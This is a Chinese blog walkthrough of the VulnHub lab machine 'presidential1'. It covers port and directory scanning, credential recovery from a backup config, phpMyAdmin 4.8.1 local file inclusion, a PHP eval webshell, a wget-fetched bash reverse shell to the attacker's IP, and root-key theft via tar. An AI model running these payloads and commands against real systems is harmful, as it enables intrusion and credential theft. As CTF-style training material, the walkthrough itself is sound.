当前位置:网站首页>【vulnhub】presidential1

【vulnhub】presidential1

2022-07-06 16:43:00 开心星人

博客主页:开心星人的博客主页
系列专栏:vulnhub
欢迎关注点赞收藏️留言
首发时间:2022年7月6日
作者水平很有限,如果发现错误,还望告知,感谢!

导航小助手

因为靶机是host-only模式
我们将kali也设置为host-only模式

主机发现

arp-scan -l
在这里插入图片描述
主机号太大或太小的丢掉,因为可能是网关之类的
所以靶机ip为192.168.110.128

端口扫描

nmap -sV -p- 192.168.110.128
在这里插入图片描述

访问80端口

在这里插入图片描述

看到有人名相关信息,之后可能需要用cwel

dirb目录扫描

dirb http://192.168.110.128
在这里插入图片描述
assets目录,先看下
在这里插入图片描述
网站源码,看看有没有扫描敏感文件,感觉没有发现什么敏感文件

cgi-bin目录403

nikto和whatweb收集信息

whatweb 192.168.110.128
在这里插入图片描述
nikto --url 192.168.110.128
在这里插入图片描述
访问一下config.php,确实有这个文件,但是为空
然后尝试会不会是备份文件config.phps 、config.php.bak

在这里插入图片描述
访问icons/README

突然对dirb产生了怀疑,为什么这几个文件没有扫出来

dirsearch重新扫目录

./dirsearch.py -u http://192.168.110.128
在这里插入图片描述
确实有config.php.bak
因为我以为它会自动下载的,就没有查看源码了
在这里插入图片描述
获得数据库的账号密码

打开about.html
在这里插入图片描述

其他版块进入不了,只有HOME和ABOUT
所以这个页面就是一个静态页面

尝试用得到的账号密码登录ssh服务

ssh -p 2082 [email protected]
在这里插入图片描述
不知道咋回事

cewl爬取字典

cewl http://192.168.110.128 -w dic0.txt
在这里插入图片描述

hydra爆破ssh

hydra -L dic0.txt -P dic0.txt ssh://192.168.110.128
在这里插入图片描述
看这报错信息,和上面用votebox的报错信息
应该是需要密钥,而不是直接用密码

子域名爆破

没有什么可以利用的信息了
进行子域名爆破

但是我们现在只有服务器的ip地址,没有域名
在这里插入图片描述
所以网站域名为votenow.local

更改host文件

vim /etc/hosts
192.168.110.128 votenow.local

想用gobuster、oneforall来爆破子域名的,但是都没有配置好

使用wfuzz
wfuzz -w /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt -H "Host: FUZZ.votenow.local" --hw 854 --hc 400 votenow.local

在Prime1靶机fuzz参数的时候用到过,-w 指定字典,-H 指定请求包头部 , --hw 和 --hc 是去除响应为指定长度的结果
在这里插入图片描述

得到一个子域名datasafe
写入hosts文件

vim /etc/hosts
192.168.110.128 datasafe.votenow.local

登录数据库

在这里插入图片描述
用得到的数据库账号登录
在这里插入图片描述
在这里插入图片描述
拿到了admin和密码

john破解密码

【Try to Hack】john哈希破解工具

在这里插入图片描述

得到admin的密码为Stella

尝试用admin登录ssh(失败)

ssh -p 2082 [email protected]
在这里插入图片描述
确实是必须要证书的

phpmyadmin漏洞渗透

在这里插入图片描述
告诉我们了版本号4.8.1
searchsploit phpmyadmin
在这里插入图片描述
cp /usr/share/exploitdb/exploits/php/webapps/50457.py /root
在这里插入图片描述
这个RCE的CVE不太会用

跟着别人用文件包含复现一下

phpMyAdmin 4.8.1 - (Authenticated) Local File Inclusion (1)                                             | php/webapps/44924.txt
phpMyAdmin 4.8.1 - (Authenticated) Local File Inclusion (2)                                             | php/webapps/44928.txt

searchsploit -x php/webapps/44928.txt
在这里插入图片描述

在这里插入图片描述
构造url
http://datasafe.votenow.local/index.php?target=db_sql.php%253f/../../../../../../../../var/lib/php/session/sess_d4qpkliuhiq1anqdkqgc8v10qnq5teq8

在这里插入图片描述
复现成功了

我们现在可以写一句话木马<?php eval($_GET["ant"]); ?>

select "<?php echo file_put_contents('/var/www/html/s.php',base64_decode('PD9waHAgZXZhbCgkX0dFVFsiYW50Il0pOyA/Pg=='));exit;?>"

发现这个可能我没弄好有点问题,连不上,直接反弹shell
cd /var/www/html | echo 'bash -i >& /dev/tcp/192.168.110.129/1100 0>&1' > shell.sh
python -m SimpleHTTPServer 80
nc -lvvp 1100

执行sql
select '<?php system("wget 192.168.110.129/shell.sh; chmod +x shell.sh; bash shell.sh");exit;?>'

获得一个交互式的shell
python -c 'import pty; pty.spawn("/bin/bash")'

提权

su admin

tarS -cvf key.tar /root/.ssh/id_rsa
tar -xvf key.tar
cd root/.ssh
ssh -i id_rsa root@localhost -p 2082

结束

原网站

版权声明
本文为[开心星人]所创,转载请带上原文链接,感谢
https://blog.csdn.net/qq_55675216/article/details/125588026

边栏推荐

猜你喜欢

随机推荐